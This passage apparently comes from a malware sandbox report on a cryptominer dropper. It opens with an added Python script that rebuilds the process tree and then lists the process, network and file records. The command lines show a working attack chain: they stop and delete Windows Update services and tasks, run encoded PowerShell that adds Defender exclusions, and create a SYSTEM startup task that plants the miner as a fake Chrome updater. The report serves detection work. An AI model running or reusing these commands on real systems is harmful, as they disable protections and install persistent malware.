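The rows above are really a process tree: every "PID X wrote to memory of Y" pair is a parent injecting the startup data of a child it has just created. The catch is that PID 2668 appears twice with different images: it is the dropper at the top of the tree and, later, one of the sc.exe children of cmd.exe 4596, so a tree keyed on PID alone would attach the dropper's whole subtree under a short-lived sc.exe. The script below is an added example (not part of the sandbox report or its tooling) that rebuilds the tree from a subset of the rows copied verbatim from the table, keys nodes on (PID, image path), and reports the collision.

```python
"""Rebuild the process tree from the 'Suspicious use of WriteProcessMemory'
rows above. Nodes are keyed by (PID, image path) rather than PID alone,
because PID 2668 is reused: it is the dropper at the top of the tree and,
later, one of the sc.exe children of cmd.exe 4596."""
import ntpath
import re

# Subset of the rows above, copied exactly. Duplicates are kept on purpose:
# the report lists every write call, so most children appear twice.
SAMPLE_ROWS = r"""
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 2668 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 1220 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 4596 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4340 wrote to memory of 1540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 4596 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 1540 wrote to memory of 1108 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4596 wrote to memory of 2448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4596 wrote to memory of 5088 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4340 wrote to memory of 3332 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

Node = tuple[int, str]  # (pid, image path): the PID by itself is not unique

# The parent image is matched non-greedily up to the next drive-letter prefix,
# so image paths containing spaces (C:\Program Files\...) still split correctly.
ROW = re.compile(
    r"^PID (\d+) wrote to memory of (\d+) N/A ([A-Za-z]:\\.*?) ([A-Za-z]:\\.*)$"
)


def parse_rows(text: str) -> list[tuple[Node, Node]]:
    """Unique (parent, child) edges in first-seen order."""
    edges: dict[tuple[Node, Node], None] = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            ppid, pid, pimg, cimg = m.groups()
            edges[((int(ppid), pimg), (int(pid), cimg))] = None
    return list(edges)


def pid_collisions(edges: list[tuple[Node, Node]]) -> set[int]:
    """PIDs seen with more than one image. Keying on PID alone would merge
    these into a single bogus node and corrupt the tree."""
    images: dict[int, set[str]] = {}
    for edge in edges:
        for pid, image in edge:
            images.setdefault(pid, set()).add(image)
    return {pid for pid, imgs in images.items() if len(imgs) > 1}


def build_tree(edges: list[tuple[Node, Node]]):
    """Return (roots, children) where children maps each node to its kids."""
    children: dict[Node, list[Node]] = {}
    is_child: set[Node] = set()
    for parent, child in edges:
        children.setdefault(parent, []).append(child)
        children.setdefault(child, [])
        is_child.add(child)
    roots = [n for n in children if n not in is_child]
    return roots, children


def render(roots: list[Node], children: dict[Node, list[Node]]) -> list[str]:
    """Indented tree, one line per node, with a guard against cycles."""
    lines: list[str] = []

    def walk(node: Node, depth: int, path: frozenset) -> None:
        pid, image = node
        if node in path:  # only possible if PID and image both repeat
            lines.append("  " * depth + f"<cycle back to {pid}>")
            return
        lines.append("  " * depth + f"{ntpath.basename(image)} [{pid}]")
        for child in children[node]:
            walk(child, depth + 1, path | {node})

    for root in roots:
        walk(root, 0, frozenset())
    return lines


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    print("PIDs reused with a different image:", sorted(pid_collisions(edges)))
    print("\n".join(render(*build_tree(edges))))
```

The rendered tree puts both cmd.exe instances, the powershell.exe instances and every sc/reg/takeown/schtasks child under miner2.exe 4340, which is the shape to look for in EDR telemetry: a dropper in %TEMP% spawning a second binary from C:\Windows\Temp that fans out into LOLBins. In a live event stream the same keying problem exists, so use the process GUID your sensor provides (Sysmon's ProcessGuid, for example) instead of the PID where it is available.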

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

C:\Windows\Temp\miner2.exe

"C:\Windows\Temp\miner2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQA
tAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBzAGIAawBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBuAHQAcABhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGYAdAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAawBqAHkAIwA+AA=="

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe "duhwxeji"

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 183.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp

Files

memory/2668-1-0x0000000000BD0000-0x0000000000E66000-memory.dmp

memory/2668-0-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/2668-2-0x0000000005990000-0x00000000059A0000-memory.dmp

memory/2668-3-0x0000000005760000-0x0000000005761000-memory.dmp

memory/2668-4-0x0000000006C30000-0x0000000006EC0000-memory.dmp

C:\Windows\Temp\miner2.exe

MD5 62afcd1ef8cc551eb1964d0cb430f123
SHA1 ea00351d96f8d76d2d4cc3e44ec29fb22e7350c8
SHA256 5dd1f49ef91ed01cfbe51bcb92018bca7040f4b0dc7290d1e73f9d0aa67d42c6
SHA512 372f789513456a39344f40b9cd719752df260c012883bfbd5f7f910e97b2818a938091c5b04a1cce74c283977ebcd81eba113c4a9924a2d66bd82090860161c3

C:\Windows\Temp\miner2.exe

MD5 0700fc94902c6e42789ae960494d1202
SHA1 a181a74eb120552e2bbf9462c4220681438258d6
SHA256 483d80529a8f2ee87bc662746b0791ef3c2b43ff080f2e5c5b2cede30cc896dd
SHA512 eb7792722db4026be03197dbda172f6cb8f9c73cfd9d378ff81f6dd860cec240b83a3654529cf66d09050a7ac50ed2333d5a3357283bc731df51e253d254358e

C:\Windows\Temp\miner2.exe

MD5 a93a015905fae3123019fe759964e99b
SHA1 a0c3f8c7df1e26be2c56f17bef76828a548a2e86
SHA256 80318968a692042fb60e6113f1f6bab36d71a322d9cdd4225810aa78faf865e8
SHA512 2b4c05458234c29807f60305e6185b243802f31e325f21c70e4b7681ec10407bf3a9aa977f02195c9851c07f02351292555a84e2421f40a49ddd212bcc02b1a1

memory/4340-17-0x0000000000720000-0x00000000009AE000-memory.dmp

memory/4340-18-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-19-0x000000001C510000-0x000000001C520000-memory.dmp

memory/4340-20-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

memory/1220-31-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1220-33-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-34-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-32-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-26-0x00000202FA640000-0x00000202FA662000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_amimpl1b.j5o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1220-35-0x00000202FA950000-0x00000202FA960000-memory.dmp

memory/1220-38-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/2668-39-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/4340-40-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-41-0x000000001C4E0000-0x000000001C4F2000-memory.dmp

memory/4340-42-0x000000001C510000-0x000000001C520000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/3332-53-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3332-54-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

memory/3332-55-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

memory/3332-57-0x000002C6269C0000-0x000002C6269D0000-memory.dmp

memory/3332-60-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/4340-62-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/2064-64-0x00000289C5690000-0x00000289C56A0000-memory.dmp

memory/2064-63-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 c913447d9e5e79d4b48b15e74c4b7e8f
SHA1 98c297e75b01694ff07f3859a6dee3d7157d154c
SHA256 3d55687af7c3686bd0b26cdded48b9b637b18fadd4759339534efa30421cf2d1
SHA512 0823bedb69e8205ea24ab238a1b9b63667c93cf38d6b6b65984ca68f890ce42563c96f98391a8f6a2323d2c9aa5d468a69e6849b5a723e0fc4c1ea3d82e1325c

C:\Program Files\Google\Chrome\updater.exe

MD5 672ce418f5c580ae65310bcd716e9115
SHA1 a48737b94e2024cbe5a80b3d7de8bdac89e5f064
SHA256 57749f4e8374cb2eed1295f8ac2d063457b80c31bbb96966a11eb6e7de0d2809
SHA512 24a58f135eefb1775f429b088c9763ac3059549fad93e155fc6ba088be2227b1d0358eaf09436c59018363178b92d4cf674b1cf58bf0c4ee797477f702b03997

memory/1044-77-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

